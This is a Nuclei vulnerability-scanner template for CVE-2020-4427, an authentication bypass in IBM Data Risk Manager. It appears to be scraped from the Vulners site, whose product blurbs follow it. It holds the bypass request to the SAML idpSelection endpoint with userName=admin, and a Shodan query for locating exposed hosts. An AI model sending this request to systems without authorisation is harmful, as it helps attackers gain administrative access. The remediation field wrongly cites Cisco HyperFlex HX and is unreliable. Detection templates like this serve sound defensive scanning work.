id: CVE-2020-4427
info:
name: IBM Data Risk Manager - Authentication Bypass via SAML
author: ritikchaddha
severity: critical
description: |
IBM Data Risk Manager versions 2.0.1 through 2.0.6 are vulnerable to authentication bypass when configured with SAML authentication. A remote attacker can bypass security restrictions by sending a specially crafted HTTP request to the SAML idpSelection endpoint, allowing them to bypass the authentication process and gain full administrative access to the system.
impact: |
Unauthenticated attackers can bypass authentication via SAML endpoint and gain full administrative access to IBM Data Risk Manager, compromising all managed data risk information.
remediation: |
Apply the latest security updates and patches provided by Cisco for HyperFlex HX.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/ibm_drm_rce.rb
- https://seclists.org/fulldisclosure/2020/Apr/33
- https://www.ibm.com/support/pages/node/6206875
- https://nvd.nist.gov/vuln/detail/CVE-2020-4427
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-4427
cwe-id: CWE-287
epss-score: 0.70031
epss-percentile: 0.99296
cpe: cpe:2.3:a:ibm:data_risk_manager:*:*:*:*:*:*:*:*
metadata:
verified: false
max-request: 1
vendor: ibm
product: data_risk_manager
shodan-query: title:"IBM Data Risk Manager"
tags: cve,cve2020,ibm,saml,auth-bypass,kev,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/albatross/saml/idpSelection?id={{randstr}}&userName=admin"
matchers-condition: and
matchers:
- type: word
part: location
words:
- "localhost:8765"
- "saml/idpSelection"
condition: and
- type: status
status:
- 302
extractors:
- type: kval
part: header
kval:
- location
# digest: 4b0a00483046022100ffed633abc7fb484cee8cbe4ad6016d0d06867a1dbcd83390450e2184c156df402210086f3e9ccdc1a1c3fab38fa8aa7c82fecfdbe736705991ac116b0e540a2343a85:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation